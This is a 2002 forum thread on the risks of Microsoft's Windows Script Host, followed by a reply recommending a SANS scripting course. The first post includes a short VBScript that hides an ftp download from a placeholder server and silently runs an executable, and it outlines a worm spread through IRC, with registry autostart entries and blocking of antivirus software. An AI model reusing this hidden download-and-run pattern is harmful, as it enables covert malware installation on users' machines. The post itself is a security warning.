November 10th, 2002, 09:52 AM
Why Microsoft Scripting so powerful?
Lets look at what can you do with some scripting information
Dim fso, MyFile
Set fso = CreateObject("Scripting.FileSystemObject")
Set MyFile= fso.CreateTextFile("sometext.txt", True)
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "ftp -s:sometext.txt someftpserver.com" ,0 ' heeey look at that zero hides ftp process
WshShell.Sleep 6000000 ' lets wait
WshShell.Run "some.exe", 0
Most of the AV softwares changes registry like that
Here is the scenario.
in IRC you've taken DCC file send request of an html file its not an executeable isn't it? Accept.
I know you fed up with the microsoft security warnings just click OK to ActiveX Security warning. ILUVYOU like encoding decodes the worm make registry entries for autostart and block AV interrupt.
What dou you think? I think Microsoft should make Microsoft Scripting Host optional.
PS: VBS Code taken MSDN network and it was calc.exe example.
Skiddy Note: Don't do that!
[blur]Wotan mitt uns![/blur]
November 12th, 2002, 08:19 PM
Well - as you can see, Microsoft scripting is extremely powerful... something us *nix admins have been wanting for a long time but appears to be less in the press from Microsoft for some reason.
I recently attended SANS 2002 in Washington D.C. and got a healthy dose of "M$ Crack" as I would call it - the relative ease with which you can script the hell out of Win2K and WinXP. If you're new to the Win2K scripting arena, I HIGHLY recommend (in addition to track 5 in its entirity) track 5.6, Windows 2000/XP Scripting for Security. The class was taught by Jason Fossen, who is absolutely brilliant. (www.fossen.net) I'll warn you in advance though, Jason is so damned thorough it's a lot like trying to take a sip from a 12" water main. Then again.... if other instructors around the world were so thorough, we'ld all be getting our moneys worth for sure!